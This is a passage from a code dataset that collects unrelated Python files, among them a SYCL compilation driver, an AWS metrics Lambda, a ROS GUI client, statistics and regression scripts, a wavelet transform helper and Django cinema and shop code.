type=Path)\n parser.add_argument(\n \"--vitis_link_argfile\",\n help=\"file containing v++ -l argument\",\n type=Path)\n # There should not be other cases\n elif command == \"ipexport\":\n parser.add_argument(\n \"--target\",\n help=\"Part code for which the synthesis should be done\",\n required=True)\n # TODO delay the default to clang driver, make it required here\n parser.add_argument(\n \"--clock-period\",\n help=\"clock period description\",\n default=\"3ns\"\n )\n\n parser.add_argument(\n \"--clang_path\",\n help=\"path to the clang driver that's executing the script\",\n required=True,\n type=Path)\n parser.add_argument(\n \"--tmp_root\",\n help=\"The temporary directory where we'll put some intermediate files\",\n required=True,\n type=Path)\n parser.add_argument(\n \"-only_print_vxx_cmds\",\n help=\"Print comands instead of executing them\",\n required=False,\n type=bool)\n\n parser.add_argument(\"-o\", help=\"output file name\", required=True, type=Path)\n parser.add_argument(\"inputs\", nargs=\"+\")\n return command, parser.parse_args(args=toplevel.args)\n\n\ndef main():\n \"\"\"Script entry function\"\"\"\n command, args = parse_args()\n if command == \"vxxcompile\":\n cd = VXXCompilationDriver(args)\n else:\n cd = IPExportCompilationDriver(args)\n return cd.drive_compilation()\n\n\nif __name__ == \"__main__\":\n import sys\n try:\n if (not main()):\n sys.exit(-1)\n except KeyboardInterrupt:\n print(\"Received keyboard interrupt, will stop\")\n sys.exit(-2)\n","repo_name":"AlexanderPuckhaber/sycl","sub_path":"sycl/tools/sycl-vxx/bin/sycl_vxx.py","file_name":"sycl_vxx.py","file_ext":"py","file_size_in_byte":27547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"20301304366","text":"input_size = int(input())\nfor input_line in range(input_size):\n input_A, input_B = map(int, input().split())\n if input_A == input_B:\n print(0)\n continue\n elif input_A < input_B:\n number_min = input_A + 1 + input_A % 2\n number_max = input_B - 1 - input_B % 2\n else:\n number_max = input_A - 1 - input_A % 2\n number_min = input_B + 1 + input_B % 2\n print('{}'.format((number_max - number_min + 2) * (number_min + number_max) // 4))","repo_name":"dankoga/URIOnlineJudge--Python-3.9","sub_path":"URI_1099.py","file_name":"URI_1099.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3521337219","text":"from idea_lambda_commons import HttpClient, CfnResponse, CfnResponseStatus\n\nimport json\nimport datetime\nimport os\nimport logging\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nhttp_client = HttpClient()\n\nPHYSICAL_RESOURCE_ID = 'SolutionMetricsSO0280'\n\n# Metric Keys that come in to the Lambda that are not relayed to the IDEA solution metrics\n# ServiceToken contains the AWS account number which would remove the anonymous nature of the metrics\nMETRIC_DENYLIST_KEYS = ['ServiceToken']\n\n\ndef post_metrics(event):\n try:\n request_timestamp = str(datetime.datetime.utcnow().isoformat())\n solution_id = 'SO0280'\n uuid = event['RequestId']\n data = {\n 'RequestType': event['RequestType'],\n 'RequestTimeStamp': request_timestamp\n }\n\n # Need to validate where data is coming from\n for k, v in event['ResourceProperties'].items():\n if (\n k not in data.keys() and\n k not in METRIC_DENYLIST_KEYS\n ):\n data[k] = v\n # Metrics Account (Production)\n metrics_url = os.environ.get('AWS_METRICS_URL', 
'https://metrics.awssolutionsbuilder.com/generic')\n\n time_stamp = {'TimeStamp': request_timestamp}\n params = {\n 'Solution': solution_id,\n 'UUID': uuid,\n 'Data': data\n }\n\n metrics = dict(time_stamp, **params)\n json_data = json.dumps(metrics, indent=4)\n logger.info(params)\n headers = {'content-type': 'application/json'}\n req = http_client.http_post('POST',\n metrics_url,\n body=json_data.encode('utf-8'),\n headers=headers)\n rsp_code = req.status\n logger.info(f'ResponseCode: {rsp_code}')\n except Exception as e:\n logger.exception(f'failed to post metrics: {e}')\n\n\ndef handler(event, context):\n \"\"\"\n To improve performance and usability, IDEA sends anonymous metrics to AWS.\n You can disable this by setting 'cluster.solution.enable_solution_metrics' to False with res-admin.sh\n Data tracked:\n - SOCA Instance information\n - SOCA Instance Count\n - SOCA Launch/Delete time\n \"\"\"\n try:\n # Send Anonymous Metrics\n post_metrics(event)\n except Exception as e:\n logger.exception(f'failed to post metrics: {e}')\n finally:\n http_client.send_cfn_response(CfnResponse(\n context=context,\n event=event,\n status=CfnResponseStatus.SUCCESS,\n data={},\n physical_resource_id=PHYSICAL_RESOURCE_ID\n ))\n","repo_name":"aws/res","sub_path":"source/idea/idea-administrator/resources/lambda_functions/idea_solution_metrics/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"34"} +{"seq_id":"7190559053","text":"#!/usr/bin/env python\n# -*- coding: utf -*-\n\nimport roslib\nroslib.load_manifest('amr_ui')\n\nimport sys\nimport math\nfrom PySide.QtGui import *\nfrom PySide.QtCore import *\n\nimport rospy\nimport actionlib\nfrom tf.transformations import quaternion_from_euler\n\nfrom amr_msgs.msg import MoveToAction, MoveToGoal\n\n\nclass Form(QDialog):\n\n def __init__(self, client, parent=None):\n super(Form, self).__init__(parent)\n self.client = client\n # General layout\n new_group = QGroupBox('New goal')\n current_group = QGroupBox('Current goal')\n layout = QHBoxLayout()\n layout.addWidget(new_group)\n layout.addWidget(current_group)\n self.setLayout(layout)\n # Left side -- new goal group\n grid = QGridLayout()\n grid.addWidget(QLabel('X:'), 0, 0)\n self.x_spin = QDoubleSpinBox()\n self.x_spin.setRange(-10, 10)\n self.x_spin.setSingleStep(0.1)\n grid.addWidget(self.x_spin, 0, 1)\n grid.addWidget(QLabel('Y:'), 1, 0)\n self.y_spin = QDoubleSpinBox()\n self.y_spin.setRange(-10, 10)\n self.y_spin.setSingleStep(0.1)\n grid.addWidget(self.y_spin, 1, 1)\n grid.addWidget(QLabel('Yaw:'), 2, 0)\n self.yaw_spin = QSpinBox()\n self.yaw_spin.setRange(0, 360)\n grid.addWidget(self.yaw_spin, 2, 1)\n send_button = QPushButton('Send')\n send_button.clicked.connect(self.button_send_cb)\n grid.addWidget(send_button, 3, 0, 1, 2)\n new_group.setLayout(grid)\n # Right side -- current goal group\n grid = QGridLayout()\n grid.addWidget(QLabel('State:'), 0, 0)\n self.state_text = QLabel('unknown')\n grid.addWidget(self.state_text, 0, 1)\n grid.addWidget(QLabel('Target:'), 1, 0)\n self.target_text = QLabel()\n grid.addWidget(self.target_text, 1, 1)\n grid.addWidget(QLabel('Time left:'), 2, 0)\n grid.addWidget(QLabel('not implemented'), 2, 1)\n cancel_button = QPushButton('Cancel')\n cancel_button.clicked.connect(self.button_cancel_cb)\n grid.addWidget(cancel_button, 3, 0, 1, 2)\n current_group.setLayout(grid)\n\n def update_state_text(self, target=None):\n state = ['pending', 'active', 
'preempted', 'succeeded', 'aborted',\n 'rejected', 'preempting', 'recalling', 'recalled',\n 'lost'][self.client.get_state()]\n self.state_text.setText('%s' % state)\n if target is not None:\n self.target_text.setText('%s' % target)\n\n def button_send_cb(self):\n x = self.x_spin.value()\n y = self.y_spin.value()\n yaw = self.yaw_spin.value()\n goal = MoveToGoal()\n q = quaternion_from_euler(0, 0, yaw * math.pi / 180)\n goal.target_pose.pose.position.x = x\n goal.target_pose.pose.position.y = y\n goal.target_pose.pose.orientation.x = q[0]\n goal.target_pose.pose.orientation.y = q[1]\n goal.target_pose.pose.orientation.z = q[2]\n goal.target_pose.pose.orientation.w = q[3]\n self.client.send_goal(goal,\n done_cb=self.action_done_cb,\n active_cb=self.action_active_cb,\n feedback_cb=self.action_feedback_cb)\n goal_text = u'%.2f; %.2f; %i°' % (x, y, yaw)\n self.update_state_text(goal_text)\n\n def button_cancel_cb(self):\n self.client.cancel_goal()\n self.update_state_text('')\n\n def action_done_cb(self, state, result):\n self.update_state_text('')\n\n def action_active_cb(self):\n self.update_state_text()\n\n def action_feedback_cb(self, feeback):\n self.update_state_text()\n\n\nif __name__ == '__main__':\n rospy.init_node('move_to_client_gui')\n client = actionlib.SimpleActionClient('/motion_controller/move_to',\n MoveToAction)\n client.wait_for_server()\n app = QApplication(sys.argv)\n gui = Form(client)\n gui.show()\n rospy.on_shutdown(lambda: app.exit())\n # Qt + Python hack: this timer will allow the interpreter to run each 500\n # ms and at some point in time receive the shutdown callback from ROS.\n timer = QTimer()\n timer.start(500)\n timer.timeout.connect(lambda: None)\n # Start application execution\n sys.exit(app.exec_())\n","repo_name":"minhnh/hbrs_courses","sub_path":"15w_amr/amr_ui/nodes/move_to_client_gui.py","file_name":"move_to_client_gui.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25690054886","text":"#' % Techniques related to NLP\n#' % Xu Tian\n#' % 2017/04/04\n\n#' # Overview\n#' What are the key issues in natual language processing? The motivation to\n#' answer this question is from the need of preparing for the data scientist\n#' interview at BlackRock in Shimon's team. 
He asked me questions around text\n#' mining or other text related questions since these are heavily used in\n#' human analytics.\n\n#' # Text mining\n#' - Information retrieval:\n#' - Named entity recognition:\n#' - Sentiment analysis:\n\n#' ## Information retrieval\n#'\n\n#' # Performance and correctness measures\n#' - Precision: (also called positive predictive value) is the fraction of the\n#' documents retrieved that are relevant to the user's information need.\n#' - True positive rate:\n\n#' # Sentiment analysis of tweets\n\nfrom __future__ import division\nimport urllib.request\nimport csv\nfrom math import sqrt\nfrom string import punctuation\n\nfiles=['negative.txt', 'positive.txt', 'obama_tweets.txt']\npath='http://www.unc.edu/~ncaren/haphazard/'\nfor file_name in files:\n urllib.request.urlretrieve(path+file_name, file_name)\n\ntweets = open(\"obama_tweets.txt\").read()\ntweets_list = tweets.split('\\n')\n\npos_sent = open(\"positive.txt\").read()\npositive_words = pos_sent.split('\\n')\npositive_counts = []\n\nneg_sent = open('negative.txt').read()\nnegative_words = neg_sent.split('\\n')\nnegative_counts = []\n\nfor tweet in tweets_list:\n positive_counter = 0\n negative_counter = 0\n tweet_processed = tweet.lower()\n for p in list(punctuation):\n tweet_processed = tweet_processed.replace(p, '')\n\n words = tweet_processed.split(' ')\n word_count = len(words)\n for word in words:\n if word in positive_words:\n positive_counter = positive_counter + 1\n elif word in negative_words:\n negative_counter = negative_counter + 1\n\n positive_counts.append(positive_counter/word_count)\n negative_counts.append(negative_counter/word_count)\n\nprint(len(positive_counts))\n\noutput = list(zip(tweets_list, positive_counts, negative_counts))\nwriter = csv.writer(open('tweet_sentiment.csv', 'w'))\nwriter.writerows(output)\n\ndef calStd(l):\n n = len(l)\n avg = sum(l)/n\n return sqrt(sum([(i-avg)**2 for i in l])/n)\n","repo_name":"davisonan/myPython","sub_path":"Projects/words/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10596462205","text":"\r\n# Dataset generation script for Wells Fargo Case Study\r\n# April 2019\r\n\r\n# make sure to install these packages before running:\r\n# pip install pandas\r\n# pip install sodapy\r\n\r\nimport pandas as pd\r\nfrom sodapy import Socrata\r\n\r\n\r\ndef get_case_study_data():\r\n \"\"\"\r\n Function to match complaint narratives to message ids used in case study\r\n\r\n \"\"\"\r\n # Use Socrata client to collect consumer finance data\r\n client = Socrata(\"data.consumerfinance.gov\", None)\r\n results = client.get(\"s6ew-h6mp\", limit=99999999)\r\n\r\n # Convert to pandas DataFrame\r\n results_df = pd.DataFrame.from_records(results)\r\n results_df = results_df[['complaint_id', 'complaint_what_happened']]\r\n results_df.rename(columns={'complaint_what_happened':'text'}, inplace=True)\r\n results_df.complaint_id = results_df.complaint_id.astype('int64')\r\n\r\n # Load Case Study message ids\r\n case_study_df = pd.read_csv(\"case_study_msg_ids.csv\")\r\n case_study_df.complaint_id = case_study_df.complaint_id.astype('int64')\r\n\r\n # Join by complaint_id\r\n case_study_df = case_study_df.merge(results_df, on='complaint_id', how='left')\r\n\r\n # Drop NAs\r\n case_study_df.dropna(inplace=True)\r\n\r\n return case_study_df\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # get data\r\n df = get_case_study_data()\r\n\r\n # write to csv\r\n 
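# (sketch) index=False below keeps complaint_id as a regular column; downstream\r\n # code is assumed to read this exact filename\r\n 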
df.to_csv('case_study_data.csv', header=True, index=False)\r\n\r\n","repo_name":"akalino/comp_embed","sub_path":"src/data/raw/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7605413449","text":"from scipy.stats import chi2\nfrom scipy.stats import norm as normas\nfrom scipy.special import stdtrit\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport math\nimport openpyxl\nfrom matplotlib import pyplot as plt\n\nvar1=[0.1,1.8,3,3,2.4,0.15]\nprimer=[0.05,-3.5,2,2,-4,0.1,-3.8]\nt=primer\n#уровень доверия\nalpha=t[0]\n#гипотеза Н0 а=а0 против H2:a>a0\na0=t[1]\n#гипотеза Н01 σ=σ0 против H3:σ>σ0\nsigma0=t[2]\n#гипотеза Н02 а=а0 против H4:a<-4 при σ=2\nsigma=t[3]\na1=t[4]\n#\neps=t[5]\n\nc1=t[6]\n\n\n\nif (t==var1): top_players = pd.read_excel('./table.xlsx')\nelse: top_players = pd.read_excel('./table1.xlsx')\n\ntop_players.head()\nn=top_players.to_numpy()\na=np.array(n,float)\na=np.concatenate(a)\ncount=len(a)\n\n#Крайние члены вариационного ряда и размах выборки\na_max=a.max()\na_min=a.min()\ncont_of_intervals=int(1+math.log2(count))\nlong_og_intervals=(a_max-a_min)/cont_of_intervals\n# Выборочное среднее\nvibor_sred=sum(a)/count\n# Cреднее квадратичное отклонение\nS2=sum([ (a[i]-vibor_sred)**2 for i in range(count)])/(count-1)\nprint('Выборочное среднее ',vibor_sred)\nprint('Cреднее квадратичное отклонение ',S2)\n\nv_sigma=0\nfor i in range(0,count):\n V_sigma=v_sigma+(a[i]**2-vibor_sred)\n\nv_sigma=v_sigma/count\n\nv=[0]*cont_of_intervals\nfor i in range(0,count):\n e=0\n while(a[i]-a_min>(e+1)*long_og_intervals):\n e+=1\n v[e]+=1\n\n#Относительные частоты\not_v=[v[i]/count for i in range(cont_of_intervals)]\nprint('Сумма относительных частот',sum(ot_v))\n#Плотность относительных частот\nplotnost=[ f\"{v[i]/count/long_og_intervals:.4f}\" for i in range(cont_of_intervals)]\n\ndf = pd.DataFrame({'Интервал': [f\"{a_min+long_og_intervals*(i):.3}\" for i in range(0,cont_of_intervals)],\n ' ': [f\"{a_min+long_og_intervals*(i+1):.3}\" for i in range(0,cont_of_intervals)],\n 'Частота': [v[i] for i in range(cont_of_intervals)],\n 'Относительная частота': [f\"{ot_v[i]:.3}\" for i in range(cont_of_intervals)],\n 'Плотность': plotnost}, index = [''] * (cont_of_intervals))\nprint(df)\n\nplt.figure(1)\nfig, ax = plt.subplots(figsize=(6, 5))\nsns.histplot(a, stat='density', bins=cont_of_intervals)\n\n#f1 = 1/(2*math.sqrt(math.pi*sigma))*(math.exp(1)**(-((x-vibor_sred)**2)/(2*sigma)))\n\nC2=a0+stdtrit(count-1,alpha)/((count/S2)**(1/2))\nprint('Критическое множество - x̅>',C2)\nif(vibor_sred>C2): print('Гипотеза Н0: а=',a0,' отклоняется, так как выборочное среднее принадлежит критическому множеству')\nelse: print('Гипотеза Н0: а=',a0,' принимается, так как выборочное среднее не принадлежит критическому множеству')\n\nC3=chi2.ppf(alpha,count-1)*sigma0**2/(count-1)\nprint('Критическое множество - S^2>',C3)\nif(S2>C2): print('Гипотеза Н0: σ=',sigma0,' отклоняется, так как cреднее квадратичное отклонение принадлежит критическому множеству')\nelse: print('Гипотеза Н0: σ=',sigma0,' принимается, так как реднее квадратичное отклонение не принадлежит критическому множеству')\n\n\nC4=a0+normas.ppf(alpha)*sigma/(count)**(1/2)\nprint('Критическое множество - x̅>',C4)\nif(vibor_sred>C2): print('Гипотеза Н0: а=',a0,' отклоняется, так как выборочное среднее принадлежит критиче��кому множеству')\nelse: print('Гипотеза Н0: а=',a0,' принимается, так как выборочное 
среднее не принадлежит критическому множеству')\n\nbeta=1-normas.cdf((C4-a1)/sigma*math.sqrt(count))\nprint('β=',beta)\n\n#Оптимальное значение a1', при котором ошибка второго рода не превышает ε\na1_opt=C4-normas.ppf(1-eps)/math.sqrt(count)*sigma\nprint('Оптимальное значение a1 при котором ошибка второго рода не превышает ε',a1_opt)\n\nx = np.linspace(-10, 10)\nf1 = 1/(2*math.sqrt(math.pi*sigma))*(math.exp(1)**(-((x-a0)**2)/(2*sigma)))\nplt.plot(x, f1, ':b', label='N(a0,σ)')\nf2 = 1/(2*math.sqrt(math.pi*sigma))*(math.exp(1)**(-((x-a1)**2)/(2*sigma)))\nplt.plot(x, f2, ':r', label='N(a1,σ)')\nplt.legend()\n\n# Построим последовательный критерий Вальда для проверки гипотезы H_0: a = -3.5 = a_0\n# против альтернативы H_1: a = -4 = a_1 при известном σ = 2 = σ_1.\n\nA=(1-beta)/alpha\nB=beta/(1-alpha)\ndef l_na_l(i):\n ans=((a0**(2)-a1**(2))/(2*sigma**(2))+(a1-a0)*a[0]/(sigma**(2)))\n for j in range(1,i+1):\n ans=ans+((a0**(2)-a1**(2))/(2*sigma**(2))+(a1-a0)*a[j]/(sigma**(2)))\n return math.exp(ans)\n\nplt.figure(1)\nx = [i for i in range(1,count+1)]\ny= [l_na_l(i) for i in range(count)]\nplt.plot(x, y, 'b', label='1st component')\nplt.plot([0,120], [A,A], label='1st component')\nplt.plot([0,120], [B,B], label='1st component')\nc1=c1/count\nprint(\"математическое ожидание момента принятия решения при основной гипотезе H0\", -(alpha*math.log(A)+(1-alpha)*math.log(B))/(a1-a0)**(2)*2*sigma**2)\nprint(\"математическое ожидание момента принятия решения при основной гипотезе H1\", round((beta*math.log(B)+(1-beta)*math.log(A))/(a1-a0)**(2)*2*sigma**2,7))\nc=math.exp(count*((a1-a0)*c1/sigma**(2)+(a0**(2)-a1**(2))/(2*sigma**(2)*count)))\nprint(\"критическое множество: S={L(X,a1)/L(X,a0)>=\", round(c,5),\"}\")\nplt.plot([0,120], [c,c], label='1st component')\n\nplt.show()\n","repo_name":"Ajalova/mathematical-statistics","sub_path":"проверка гипотез/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6182,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39028656650","text":"from django.db import models\nfrom datetime import datetime, timedelta\nfrom django.contrib.auth.models import User\n\n\n# Create your models here.\nclass Pelicula(models.Model):\n titulo = models.CharField(max_length=50)\n descripcion = models.CharField(max_length=500)\n duracion_horas = models.PositiveIntegerField()\n duracion_minutos = models.PositiveIntegerField()\n imagen = models.ImageField(upload_to='peliculas')\n CLASIFICACION_EDAD_CHOICES = [\n ('+0', '+0'),\n ('+7', '+7'),\n ('+12', '+12'),\n ('+16', '+16'),\n ('+18', '+18'),\n ]\n clasificacion_edad = models.CharField(max_length=3, choices=CLASIFICACION_EDAD_CHOICES)\n precio = models.DecimalField(max_digits=5, decimal_places=2) # Campo de precio con 5 dígitos en total y 2 decimales\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n verbose_name = 'pelicula'\n verbose_name_plural = 'peliculas'\n\n def __str__(self):\n return self.titulo\n \nclass Sala(models.Model):\n nombre = models.CharField(max_length=100)\n num_filas = models.PositiveIntegerField(default=0)\n num_columnas = models.PositiveIntegerField(default=0)\n pelicula = models.ForeignKey(Pelicula, on_delete=models.CASCADE, related_name='salas', null=True, blank=True)\n\n def save(self, *args, **kwargs):\n super().save(*args, **kwargs)\n # Crear las butacas si no existen\n for fila in range(1, self.num_filas + 1):\n for numero in range(1, self.num_columnas + 1):\n 
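# seats are numbered row-major across the grid, so\n # num_butaca = (fila - 1) * num_columnas + columna runs 1..filas*columnas\n 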
num_butaca = (fila - 1) * self.num_columnas + numero\n Butaca.objects.get_or_create(sala=self, fila=fila, columna=numero, num_butaca=num_butaca)\n\n def __str__(self):\n return self.nombre\n\n\nclass Butaca(models.Model):\n fila = models.PositiveIntegerField()\n columna = models.PositiveIntegerField()\n num_butaca = models.PositiveIntegerField()\n sala = models.ForeignKey(Sala, on_delete=models.CASCADE, related_name='butacas')\n ocupada = models.BooleanField(default=False)\n\n class Meta:\n unique_together = ('sala', 'fila', 'columna')\n\n def __str__(self):\n return f'{self.sala.nombre} - Fila {self.fila} - Columna {self.columna}'\n\n\nclass Sesiones(models.Model):\n fecha = models.DateField()\n hora = models.TimeField()\n pelicula = models.ForeignKey(Pelicula, on_delete=models.CASCADE, related_name='sesiones')\n sala = models.ForeignKey(Sala, on_delete=models.CASCADE, related_name='sesiones', null=True, blank=True)\n\n class Meta:\n verbose_name = 'sesion'\n verbose_name_plural = 'sesiones'\n\n def __str__(self):\n return f'{self.fecha} {self.hora} - {self.pelicula.titulo}'\n\n def eliminar_sesiones_vencidas(self):\n now = datetime.now()\n fecha_hora = datetime.combine(self.fecha, self.hora)\n if fecha_hora < now:\n self.delete()\n # Crear nueva sesión para el día siguiente a la misma hora\n new_fecha_hora = fecha_hora + timedelta(days=1)\n nueva_sesion = Sesiones(fecha=new_fecha_hora.date(), hora=new_fecha_hora.time(), pelicula=self.pelicula, sala=self.sala)\n nueva_sesion.save()\n\n\n# class Reserva(models.Model):\n# usuario = models.ForeignKey(User, on_delete=models.CASCADE)\n# butacas_seleccionadas = models.CharField(max_length=255)\n# pelicula = models.ForeignKey(Pelicula, on_delete=models.CASCADE, null=True)\n# precio_total = models.DecimalField(max_digits=6, decimal_places=2)\n# confirmada = models.BooleanField(default=False)\n\n# def __str__(self):\n# return f\"Reserva #{self.id} - Usuario: {self.usuario.username}\"\n","repo_name":"ivanconcejal/EventiketWeb","sub_path":"Peliculas/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14035974207","text":"import pandas as pd\nfrom numpy import abs, array, dot, mean, random, sign, sqrt, zeros\nfrom numpy.linalg import solve\n\nfrom gradients import (adjust_weights, adjust_weights_with_batch,\n update_weights_huber, update_weights_mae,\n update_weights_mse)\nfrom rbf_regression import RBFRegression\nfrom utils import randomize_dataset\n\n\ndef expand_matrix(x, max_coef, min_coef=0):\n result = []\n for v in x:\n result.append([v ** i for i in range(min_coef, max_coef + 1)])\n\n return array(result)\n\n\ndef ols(X, y, degrees):\n X = expand_matrix(X, min_coef=0, max_coef=degrees)\n\n w = solve(dot(X.T, X), dot(X.T, y))\n\n return w\n\n\ndef get_coef_with_gradient(\n x, y, degrees, epochs, lr, func_adjust, batch=None, is_stochastic=False\n):\n X = expand_matrix(x, degrees, 1)\n _, n_cols = X.shape\n w = zeros((n_cols, 1))\n losses = []\n b = 0\n if is_stochastic:\n X, y = randomize_dataset(X, y)\n\n if batch:\n w, b, losses = adjust_weights_with_batch(\n X, y, w, b, epochs, batch, losses, lr, func_adjust\n )\n else:\n w, b, losses = adjust_weights(X, y, w, b, epochs, losses, lr, func_adjust)\n\n return w, b, losses\n\n\ndef get_coef_with_elastic_net(\n x,\n y,\n degree,\n tol=1e-5,\n max_iterators=1e6,\n learning_rate=1e-4,\n ridge_coef=0.6,\n lasso_coef=0.2,\n):\n X = expand_matrix(x, degree, 0)\n _, 
n_cols = X.shape\n w = random.randn(n_cols).reshape((n_cols, 1)) / sqrt(n_cols)\n skip = False\n losses = []\n count_iter = 0\n while not skip:\n count_iter += 1\n y_hat = dot(X, w)\n dif = dot(X.T, (y_hat - y))\n\n # the L1 (lasso) penalty differentiates to sign(w), the L2 (ridge) penalty to 2*w\n dw = learning_rate * (dif + lasso_coef * sign(w) + ridge_coef * 2 * w)\n w = w - dw\n mse = ((y_hat - y).T.dot(y_hat - y) / len(y)).flatten()\n\n losses.append(mse[0])\n if mean(abs(dw)) <= tol:\n skip = True\n if count_iter == max_iterators:\n skip = True\n\n return w\n\n\nif __name__ == \"__main__\":\n PATH_FILE = \"/home/nobrega/Dados/Documentos/Estudos/notes/dataset/polynomial_regression_data.csv\"\n df = pd.read_csv(PATH_FILE)\n\n X = df.x.values\n y = df.y.values\n y = y.reshape(len(y), 1)\n degree = 7\n weights = ols(X, y, degree)\n weights_gd, linear_coef_gd, losses = get_coef_with_gradient(\n X, y, degree, 2000, lr=0.01, func_adjust=update_weights_mse\n )\n\n weights_gd_batch, linear_coef_bd_batch, losses = get_coef_with_gradient(\n X,\n y,\n degree,\n 20,\n lr=0.01,\n batch=10,\n func_adjust=update_weights_mae,\n is_stochastic=True,\n )\n\n rbf = RBFRegression(20, beta=4)\n rbf.fit(expand_matrix(X, degree, 0), y)\n weights_elastic_net = get_coef_with_elastic_net(X, y, degree)\n y_hat = dot(expand_matrix(X, degree, 0), weights)\n y_hat_gradient = dot(expand_matrix(X, degree, 1), weights_gd) + linear_coef_gd\n y_hat_gradient_batch = (\n dot(expand_matrix(X, degree, 1), weights_gd_batch) + linear_coef_bd_batch\n )\n y_hat_elastic_net = dot(expand_matrix(X, degree, 0), weights_elastic_net)\n y_hat_rbf = rbf.predict(expand_matrix(X, degree, 0))\n from matplotlib import pyplot as plt\n\n plt.plot(y, c=\"c\", label=\"Original\")\n plt.plot(y_hat, c=\"g\", label=\"Predicted\")\n plt.plot(y_hat_gradient, c=\"r\", label=\"Predicted with Gradient\")\n plt.plot(y_hat_gradient_batch, c=\"b\", label=\"Predicted with Gradient and Batch\")\n plt.plot(y_hat_elastic_net, c=\"k\", label=\"Predicted with Elastic Net\")\n plt.plot(y_hat_rbf, c=\"y\", label=\"Predicted with RBF\")\n plt.legend()\n plt.show()\n","repo_name":"GiovaniGitHub/notes","sub_path":"python/polynomial_regression.py","file_name":"polynomial_regression.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36976482511","text":"import pywt\nimport numpy as np\nimport math\n\ndef get2DWaveletCoefficients(signal, wavelet=\"haar\", mode=\"smooth\"):\n wavedec2 = pywt.wavedec2(signal, wavelet, mode=mode)\n hsm = wavedec2[0]\n wave_dec= wavedec2[1:]\n wave_dct = {}\n for idx_one, array_one in enumerate(wave_dec):\n [cH, cV, cD] = list(map(lambda x: x.flatten(), array_one))\n for idx_two, (this_cH, this_cV, this_cD) in enumerate(zip(cH, cV, cD)):\n wave_dct[(idx_one, idx_two)] = {\"cH\": this_cH, \"cV\": this_cV, \"cD\": this_cD}\n return hsm, wave_dct\n\ndef inverse2DDWT(coeffs, wavelet=\"haar\", mode=\"smooth\"):\n hsm, wave_dict = coeffs\n wave_levels = []\n number_of_roots = len(hsm.flatten())\n dim_of_root = hsm.shape[0]\n nodes_per_tree = (len(wave_dict) + number_of_roots) / (number_of_roots)\n # The number of nodes in a quad-tree of depth n is:\n # 1 + 4 + 4^2 + ... 
+ 4^n = ( 4^(n+1) - 1 ) / 3\n # Thus the number of levels is log_4(number_of_nodes + 1)\n number_of_levels = int(math.log((3 * nodes_per_tree + 1), 4))\n\n # This sort step is actually not needed, as the wavelet coefficients are in the correct order\n # but we do it just to be safe\n sorted_wavedict = sorted(list(wave_dict.items()), key=lambda x: (x[0][0], x[0][1]))\n detail_levels = []\n prevStartIndex = 0\n for i in range(0, number_of_levels):\n startIndexThisLevel = prevStartIndex\n endIndexThisLevel = startIndexThisLevel + number_of_roots*4**i\n\n thisLevel = sorted_wavedict[startIndexThisLevel:endIndexThisLevel]\n thisLevelDetail_cH = np.fromiter(map(lambda x: x[1]['cH'], thisLevel),dtype=float).reshape(dim_of_root*2**i, dim_of_root*2**i)\n thisLevelDetail_cV = np.fromiter(map(lambda x: x[1]['cV'], thisLevel),dtype=float).reshape(dim_of_root*2**i, dim_of_root*2**i)\n thisLevelDetail_cD = np.fromiter(map(lambda x: x[1]['cD'], thisLevel),dtype=float).reshape(dim_of_root*2**i, dim_of_root*2**i)\n detail_level = ([thisLevelDetail_cH, thisLevelDetail_cV, thisLevelDetail_cD])\n detail_levels.append(detail_level)\n prevStartIndex = endIndexThisLevel\n\n wave_levels = detail_levels\n to_reconstruct = [hsm, *wave_levels]\n return pywt.waverec2(to_reconstruct, wavelet, mode=mode)\n\n\n# hsm ,wave_dct = get2DWaveletCoefficients(np.arange(8*8).reshape((8, 8)), \"haar\", \"smooth\")\n# inverse_signal = inverse2DDWT((hsm, wave_dct), \"haar\", \"smooth\")\n# print(\"inverse signal\", inverse_signal)","repo_name":"kanarian/thesis","sub_path":"WaveletTransform/TwoDWaveletTransformer.py","file_name":"TwoDWaveletTransformer.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33974883671","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom .models import *\nfrom django.contrib import messages #import messages\nimport json\nimport datetime\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth import authenticate, login, logout\n#from django.shortcuts import render\nfrom django.core.mail import send_mail\n# Create your views here.\nfrom .forms import CreateUserForm\nfrom .utils import cookieCart, cartData, guestOrder\n\n\n\n\ndef registerPage(request):\n form = CreateUserForm()\n\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n # form.save() returns the newly created User, which the group and\n # Customer below both need\n user = form.save()\n group = Group.objects.get(name='customer')\n user.groups.add(group)\n #Added username after video because of error returning customer name if not added\n Customer.objects.create(\n user=user,\n name=user.username,\n )\n\n messages.success(request, 'Account was created for '+user.username)\n return redirect('login')\n context = {'form':form}\n return 